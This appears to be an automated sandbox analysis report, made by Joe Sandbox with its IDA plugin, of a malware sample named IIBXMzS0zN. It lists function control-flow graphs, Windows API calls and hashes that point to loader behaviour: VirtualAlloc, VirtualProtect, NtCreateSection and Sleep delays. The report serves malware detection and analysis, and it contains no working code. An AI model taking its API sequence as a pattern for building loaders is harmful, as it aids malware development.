                                                                                                                                                                      control_flow_graph 1 1f003c-1f0047 2 1f004c-1f0263 call 1f0a3f call 1f0e0f call 1f0d90 VirtualAlloc 1->2 3 1f0049 1->3 18 1f028b-1f0292 2->18 19 1f0265-1f0289 call 1f0a69 2->19 3->2 21 1f02a1-1f02b0 18->21 23 1f02ce-1f03c2 VirtualProtect call 1f0cce call 1f0ce7 19->23 21->23 24 1f02b2-1f02cc 21->24 30 1f03d1-1f03e0 23->30 24->21 31 1f0439-1f04b8 VirtualFree 30->31 32 1f03e2-1f0437 call 1f0ce7 30->32 34 1f04be-1f04cd 31->34 35 1f05f4-1f05fe 31->35 32->30 37 1f04d3-1f04dd 34->37 38 1f077f-1f0789 35->38 39 1f0604-1f060d 35->39 37->35 41 1f04e3-1f0505 37->41 42 1f078b-1f07a3 38->42 43 1f07a6-1f07b0 38->43 39->38 44 1f0613-1f0637 39->44 52 1f0517-1f0520 41->52 53 1f0507-1f0515 41->53 42->43 45 1f086e-1f08be LoadLibraryA 43->45 46 1f07b6-1f07cb 43->46 47 1f063e-1f0648 44->47 51 1f08c7-1f08f9 45->51 49 1f07d2-1f07d5 46->49 47->38 50 1f064e-1f065a 47->50 54 1f07d7-1f07e0 49->54 55 1f0824-1f0833 49->55 50->38 56 1f0660-1f066a 50->56 57 1f08fb-1f0901 51->57 58 1f0902-1f091d 51->58 59 1f0526-1f0547 52->59 53->59 60 1f07e4-1f0822 54->60 61 1f07e2 54->61 63 1f0839-1f083c 55->63 62 1f067a-1f0689 56->62 57->58 64 1f054d-1f0550 59->64 60->49 61->55 65 1f068f-1f06b2 62->65 66 1f0750-1f077a 62->66 63->45 67 1f083e-1f0847 63->67 73 1f0556-1f056b 64->73 74 1f05e0-1f05ef 64->74 68 1f06ef-1f06fc 65->68 69 1f06b4-1f06ed 65->69 66->47 70 1f084b-1f086c 67->70 71 1f0849 67->71 75 1f06fe-1f0748 68->75 76 1f074b 68->76 69->68 70->63 71->45 77 1f056f-1f057a 73->77 78 1f056d 73->78 74->37 75->76 76->62 81 1f057c-1f0599 77->81 82 1f059b-1f05bb 77->82 78->74 85 1f05bd-1f05db 81->85 82->85 85->64
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 001F024D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432458684.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1f0000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID: cess$kernel32.dll
                                                                                                                                                                      • API String ID: 4275171209-1230238691
                                                                                                                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                      • Instruction ID: 8ec4a7bdf53c5b95cfdf35a861455de8e6bc33b14d16b850f7662a393963fbf9
                                                                                                                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D526974A01229DFDB65CF58C984BA8BBB1BF09304F1580D9E94DAB352DB30AE85DF14
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 001F0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 427 1f0e0f-1f0e24 SetErrorMode * 2 428 1f0e2b-1f0e2c 427->428 429 1f0e26 427->429 429->428
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,001F0223,?,?), ref: 001F0E19
                                                                                                                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,001F0223,?,?), ref: 001F0E1E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432458684.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1f0000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                      • Instruction ID: e42ae791f01396f898893d9b916e06553859c346632d715855d870cce6d42db5
                                                                                                                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                      • Instruction Fuzzy Hash: 90D0123154512CB7D7012A94DC09BDD7B1CDF09B62F008411FB0DD9081C770994046E5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00420E80 Relevance: 1.5, APIs: 1, Instructions: 9libraryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 430 420e80-420eb6 LoadLibraryA
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNELBASE(0042ECB8,004213D3), ref: 00420EB0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432518633.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00413000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_413000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                      • Opcode ID: 3193188a67bfd05105940a1f3b4ac3fb378d0a95354f5de457203bb2f1935f83
                                                                                                                                                                      • Instruction ID: 0676769115eb9f49202f6ab6b86a943d872ee6c77840cf1f180e8257c2dd3152
                                                                                                                                                                      • Opcode Fuzzy Hash: 3193188a67bfd05105940a1f3b4ac3fb378d0a95354f5de457203bb2f1935f83
                                                                                                                                                                      • Instruction Fuzzy Hash: C0D0C97474D390CDDB618F97BE097083E61AB11704BC0506DD0506A3B2CFB8000ACB5D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040193E Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 431 40193e-401947 432 40195e 431->432 433 40194f-40195a 431->433 432->433 434 401961-4019ae call 4011cd Sleep call 401452 432->434 433->434 445 4019b0-4019b8 call 401553 434->445 446 4019bd-401a03 call 4011cd 434->446 445->446
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
                                                                                                                                                                      • Instruction ID: 4db8ba0b08380255fc5aa34ea3e13561f838480f888933e927f1079a64c57490
                                                                                                                                                                      • Opcode Fuzzy Hash: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A11CEF120C208FBEB006A959D62E7A3268AB40714F304137BA43790F1D57E8923F76B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040194A Relevance: 1.3, APIs: 1, Instructions: 57sleepCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 460 40194a-4019ae call 4011cd Sleep call 401452 473 4019b0-4019b8 call 401553 460->473 474 4019bd-401a03 call 4011cd 460->474 473->474
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
                                                                                                                                                                      • Instruction ID: 0371ecd990254dd767a604aa567081474727263e4e3774a05daf7e54a603023c
                                                                                                                                                                      • Opcode Fuzzy Hash: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
                                                                                                                                                                      • Instruction Fuzzy Hash: A901A1B120C204EBDB009A95DD62E7A3364AB40314F30453BBA437A1F1C67D9913E72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040195C Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 488 40195c-4019ae call 4011cd Sleep call 401452 500 4019b0-4019b8 call 401553 488->500 501 4019bd-401a03 call 4011cd 488->501 500->501
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
                                                                                                                                                                      • Instruction ID: 3b2e7dc224df146109f963d95c0ead7a9e1b698bafe8296883a7ac19869aede1
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
                                                                                                                                                                      • Instruction Fuzzy Hash: BA0171B5208204EADB006AD5DD71E7A3269AB44314F304537BA43791F1D57D8912F72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401973 Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
                                                                                                                                                                      • Instruction ID: 4b03b50232763afd30ab0c608f125a1a80ed78bb00471cf4ed55e3bed959d7b6
                                                                                                                                                                      • Opcode Fuzzy Hash: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
                                                                                                                                                                      • Instruction Fuzzy Hash: F80184B5208204EBDB006AD5DD71EBA3269AB44354F304537BA43790F1C57D8912F72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401964 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: e5353c19dd0b10c2d892503bd00f36fba5e3f507ee708bcba0cfbdc82fbef293
                                                                                                                                                                      • Instruction ID: f592bab324d3cd5d6286c78059ef0a1e8702b22de7bd53a4ec4d5e19e7ef6e8c
                                                                                                                                                                      • Opcode Fuzzy Hash: e5353c19dd0b10c2d892503bd00f36fba5e3f507ee708bcba0cfbdc82fbef293
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D0184B5208204EBDB006AC5DD62EBA3265AB44314F204537FA43791F1C57D8912F72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00552250 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005522A1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1433007725.000000000054F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0054F000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_54f000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                      • Instruction ID: 1817636ef4f2211a40e7083c0b668c52e6378c47a8565db80272b265dc64aa64
                                                                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                      • Instruction Fuzzy Hash: B7113C79A00208EFDB01DF98C995E98BFF5AF08751F058095F9489B362D371EA90DF80
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401987 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: 74fb996ba95ec06bb2abe22af5600ab9efc13f551b73dbf86f34961914988ff4
                                                                                                                                                                      • Instruction ID: 68c2b1bb8267a16b47d2b790190fa602822f098e0b694be4ddc2e306b3be1968
                                                                                                                                                                      • Opcode Fuzzy Hash: 74fb996ba95ec06bb2abe22af5600ab9efc13f551b73dbf86f34961914988ff4
                                                                                                                                                                      • Instruction Fuzzy Hash: 2AF086B5208204FADB006BD59D61EBA3768AB44354F204137BA13790F1C57D8912F72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040197A Relevance: 1.3, APIs: 1, Instructions: 45sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: f19d6598d7b3f8bbc47500c90c3d0bc6a0ede41a7b6f28d3ccddc132527cc834
                                                                                                                                                                      • Instruction ID: 49220a4dcaca44086484813bdb512237367292e15b320859d1a96440f4f24ef4
                                                                                                                                                                      • Opcode Fuzzy Hash: f19d6598d7b3f8bbc47500c90c3d0bc6a0ede41a7b6f28d3ccddc132527cc834
                                                                                                                                                                      • Instruction Fuzzy Hash: 7801A7B1208244FBDB016BD19D62EB93768AB05354F204537FA53790F2C67D8912E72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00421060 Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 244timememorynetworkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00421092
                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 0042109A
                                                                                                                                                                      • GetConsoleAliasesW.KERNEL32(00000000,00000000,00000000), ref: 004210A6
                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 004210C2
                                                                                                                                                                      • ResetEvent.KERNEL32(00000000), ref: 00421107
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 00421120
                                                                                                                                                                      • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 0042114E
                                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00421156
                                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000000,?), ref: 00421165
                                                                                                                                                                      • EnumDateFormatsExA.KERNEL32(00000000,00000000,00000000), ref: 00421171
                                                                                                                                                                      • GetStartupInfoW.KERNEL32(00000000), ref: 00421182
                                                                                                                                                                      • GetModuleHandleExA.KERNEL32(00000000,0042A3F0,?), ref: 0042119F
                                                                                                                                                                      • OpenJobObjectA.KERNEL32(00000000,00000000,00000000), ref: 004211EB
                                                                                                                                                                      • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 004211FD
                                                                                                                                                                      • DnsHostnameToComputerNameA.KERNEL32(0042A408,?,?), ref: 00421216
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042122C
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,00000000,?,00000000), ref: 0042123F
                                                                                                                                                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(?,00000000,00000000), ref: 00421298
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00000000), ref: 004212A0
                                                                                                                                                                      • MoveFileExW.KERNEL32(0042A484,0042A410,00000000), ref: 004212B2
                                                                                                                                                                      • OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 004212BE
                                                                                                                                                                      • CompareStringW.KERNEL32(00000000,00000000,0042A4A8,00000000,0042A48C,00000000), ref: 004212D6
                                                                                                                                                                      • GetProcessHeaps.KERNEL32(00000000,00000000), ref: 004212E0
                                                                                                                                                                        • Part of subcall function 00420FB0: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00420FEB
                                                                                                                                                                        • Part of subcall function 00420FB0: ReadEventLogA.ADVAPI32(00000000,00000000,00000000,?,00000000,?,?), ref: 00421008
                                                                                                                                                                        • Part of subcall function 00420FB0: CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042101E
                                                                                                                                                                        • Part of subcall function 00420FB0: FileTimeToLocalFileTime.KERNEL32 ref: 0042103E
                                                                                                                                                                      • GetProcessWorkingSetSize.KERNEL32(00000000,00000000,00000000), ref: 0042141B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432518633.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00413000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_413000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time$DirectoryFile$AliasesConsoleCreateCurrentEnvironmentEventFreeInfoLocalOpenProcessStrings$ByteCharCommCompareComputerConfigCountDateDefaultEnumErrorFormatsHandleHeapsHostnameIncrementInterlockedLastLengthLocaleModuleMoveMultiNameNamedObjectPipeReadResetSizeSpecificStartupStringSystemTickTimerWaitableWideWorking
                                                                                                                                                                      • String ID: tl_
                                                                                                                                                                      • API String ID: 3965127379-2653253968
                                                                                                                                                                      • Opcode ID: 6ee82755cd10cf319fdfd8f29cf3dbc211cc1ced95e99afee6c4bc9845ccf9a9
                                                                                                                                                                      • Instruction ID: 4a4c08fefbaece2af6b0b121e799fa951424239d93ca7334db3a2d95049d94ba
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ee82755cd10cf319fdfd8f29cf3dbc211cc1ced95e99afee6c4bc9845ccf9a9
                                                                                                                                                                      • Instruction Fuzzy Hash: 76A18370B44324EBE724DF50EC4AB9D77B0BB14705F9080BAE609661E0DBB41A89CF5E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00420FB0 Relevance: 6.0, APIs: 4, Instructions: 50pipetimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00420EF0: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00420F07
                                                                                                                                                                        • Part of subcall function 00420EF0: LoadLibraryA.KERNEL32(00000000), ref: 00420F0F
                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00420FEB
                                                                                                                                                                      • ReadEventLogA.ADVAPI32(00000000,00000000,00000000,?,00000000,?,?), ref: 00421008
                                                                                                                                                                      • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042101E
                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32 ref: 0042103E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432518633.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00413000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_413000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileTime$AllocateCreateEnvironmentEventFreeHeapLibraryLoadLocalNamedPipeReadStrings
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3811978434-0
                                                                                                                                                                      • Opcode ID: 7253bc6bf175576f58a7ba9c5ab029a83c8e781c64d547ea6e26a6b51f192e90
                                                                                                                                                                      • Instruction ID: b286ce8c588fc6cc5be4cee3ce191696b106358ee3b957089513613f40add585
                                                                                                                                                                      • Opcode Fuzzy Hash: 7253bc6bf175576f58a7ba9c5ab029a83c8e781c64d547ea6e26a6b51f192e90
                                                                                                                                                                      • Instruction Fuzzy Hash: 420152713443019FD320DF64EC86F9A77E4BB98705F81482DF245861A1DBB4954D8B6A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 001F092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432458684.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1f0000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: .$GetProcAddress.$l
                                                                                                                                                                      • API String ID: 0-2784972518
                                                                                                                                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                      • Instruction ID: 005f56c95f042a3818d41bdc6e08aa2a907da295eaac385061b6177aced08fab
                                                                                                                                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                      • Instruction Fuzzy Hash: 41318EB6900609CFDB11CF99C880AADBBF5FF08328F15404AD545A7312D7B1EA45CFA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00403335 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1432481594.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_IIBXMzS0zN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6cec0aee256c75549f2f62a88bbc472755457b35f513753e4aad3764dae2eef7
